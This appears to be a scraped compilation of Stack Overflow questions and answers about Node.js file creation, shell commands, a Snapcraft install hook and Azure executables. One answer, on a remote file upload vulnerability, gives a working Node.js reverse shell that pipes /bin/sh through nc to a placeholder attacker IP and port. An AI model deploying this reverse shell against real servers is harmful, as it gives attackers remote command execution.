Create a file on remote server with nodejs - node.js

What is the easiest way to create a file on a remote server (can be accessed with ssh) in NodeJS?
Example: I work on my local computer, and there exists a remote server with ip 192.168.1.100. I would like to create an empty text file on this server, in path "/home/users/share".
I tried using some scp library in NodeJS, but could not copy my file to the remoted server.

What do you mean?
If file is created in path, that ssh has access, and rights are set OK, then file be acceseable.
Do you want to generate data on the server and save it?
https://nodejs.org/api/fs.html#fs_fs_writefile_file_data_options_callback
Choose a file from the disk and upload it to the server? eg: https://www.w3schools.com/nodejs/nodejs_uploadfiles.asp

If I am correct, you want to create file on different server using Nodejs and want to access the file using ssh.
If your server has linux then you can use rsync command from terminal.
E.g rsync --chmod=u+rwx,g+rwx,o+rwx /path/to/file server:/path/to/file.
And if you want it done from Nodejs then you can use child_process library to execute all terminal commands.
const { exec } = require('child_process');
exec('rsync --chmod=u+rwx,g+rwx,o+rwx /path/to/file server:/path/to/file', (err, () =>
if (err) {
// node couldn't execute the command
return;
}
}));

Related

Execute shell script for database backup

I have a ReactJS-neo4j application, deployed on a cloud server. Currently, i create backups of my databases manually.
Now I want to automate this process. I want to automatically execute the above query every day
Can anyone tell me how to automate the above process ?
You need to change your neo4j configuration file found in <HOME_neo4j>/conf/neo4j.conf as below. The location of the file is different if you are not using Linux server, like Debian.
apoc.export.file.enabled=true
apoc.import.file.use_neo4j_config=false
The 2nd line will enable you to save the json file from default folder "import" to any folder you want.
Then open a terminal (or ssh) that connects to your cloud server. Go to <HOME_neo4j> directory where cypher-shell is installed. Copy and run this one liner script below.
echo "CALL apoc.export.json.all(\"/home/backups/deploymentName/backup_mydeployment.json\", { useTypes: true } )" | bin/cypher-shell -u neo4j -p <awesome_psw> --format plain
This will save the json file in /home/backups/deploymentName just like what you do in your neo4j browser.
I will leave it up to you on 1) how to add the timestamp YYMMDD0000_ in the filename via linux command and 2) schedule the job every midnight via crontab. Goodluck!

Saving a file in a Snap (Snapcraft) with NodeJS

I am having an issue with creating a new file while my snap is running; example:
1) Snap starts and checks for the config.json file at ./config/config.json
2) If that file is not found (it never is the first time the application runs) it will create it fs.writeFile('./config/config.json', 'My Data', 'utf8', (err) => {....})
3) I Then look for that file later to use it.
I am able to run my node app and all works as expected when using node index.js
I am also able to run using snap try prime/ --devmode and all works.
When running snap try prime/ I get this error in the syslog
Error: ENOENT: no such file or directory, open './config/config.json'
It is erroring at the point of creation.
Any help with this would be awesome!! Thanks in advance.
I was able to solve this by NOT creating and checking for the config files in NodeJS and moving all of that logic to an install hook (https://docs.snapcraft.io/build-snaps/hooks).
So now my Install hook will check for the config file and create it if it's not there, then I allow NodeJS to write to that file later so I can still make all the HTTP requests in NodeJS and not in Bash. Below is my Install hook, don't forget to make it executable.
This file is located at snap/hooks/install
#!/bin/sh
set -e
CONFIG_FILE=$SNAP_COMMON/config.json
if [ ! -f $CONFIG_FILE ]; then
# File Not Found, Create it
echo '{}' > $CONFIG_FILE
fi
Hope this helps someone!

NodeJS remote file upload vulnerability

i'm trying to learn NodeJS pentesting process i have a found a remote file upload vulnerability in a Nodejs website ,can i upload a remote shell in NodeJS , like we do in PHP or ASPX and execute command ? can i upload a NodeJS shell.js and execute unix command in the server from this shell ?
Not sure if this is what you're looking for, but if you have the ability to upload a NodeJS script to a server and execute it, then yes, you can run shell commands using child_process.exec (see here for a similar question/answer).
It's possible only if you can "EXECUTE" the file.
But if you can "execute" JavaScript code you could create a reverse shell using this:
(function () {
require("child_process")
.exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerIP> <attackerPort> >/tmp/f')
})()]
Otherwise if you can't execute the file then you only will see the content of the file:
https://myvulnerablewebsite.com/hack.js

Buildstops not creating file with exec in node js

I'm running two commands
indexer idx_name --rotate
indexer idx_name --buildstops dict_file 10
Everything is fine when I run these commands from command line. However, when I pass these two commands through my node application using exec, first command works successfully and for second command the dict_file is not getting generated.
I tried some combinations with sudo, but it didn't help. I checked the stdout from both these ways(node and shell) and it looked same.
Here is my node js code:
var exec = require('child_process').exec;
var cmd = 'indexer idx_name --rotate && indexer idx_name --buildstops dict_file 10';
exec(cmd, function(err, stdout, stderr) {
console.log(stdout);
});
Is there something I'm missing ?
Which ever user is running node, will need permission to write dict_file.
Might even find it easier to delete the file, and let it be created by the right user via node (assuming that user can write the the folder)
Sudo could also work, but will need to make sure the user running node, has sudo permissions. Sorting that is definitly outside the remit of stackoverflow.
... do also check you looking in the right place. In your example you dont show a path, so the file dict_file will just be created in the current working directory (not sure how node configures that)

Run executable from local storage using Azure Web Role

i'm trying to run a simple executable using an Azure Web Role.
The executable is stored in the Web Role's local storage.
The executable produces a log.txt file once it has been run.
This is the method I am using to run the executable:
public void RunExecutable(string path)
{
Process.Start(path);
}
Where path is localStorage.RootPath + "Application.exe"
The problem I am facing is that when I open the local storage folder the executable is there however there is no log.txt file.
I have tested the executable, it works if I manually run it, it produces the log.txt file.
Can anyone see the problem?
Try setting an explicit WorkingDirectory for the process... I wonder if log.txt is being created, just not where you expect. (Or perhaps the app is trying to create log.txt but failing because of the permissions on the directory it's trying to create it in.)
If you remote desktop into the instance, can't you find the file created at E:\approot\ folder ? As Steve said, using a WorkingDirectory for the process will fix the issue
You can use Environment.GetEnvironmentVariable("RoleRoot") to construct the URL to your application root

Resources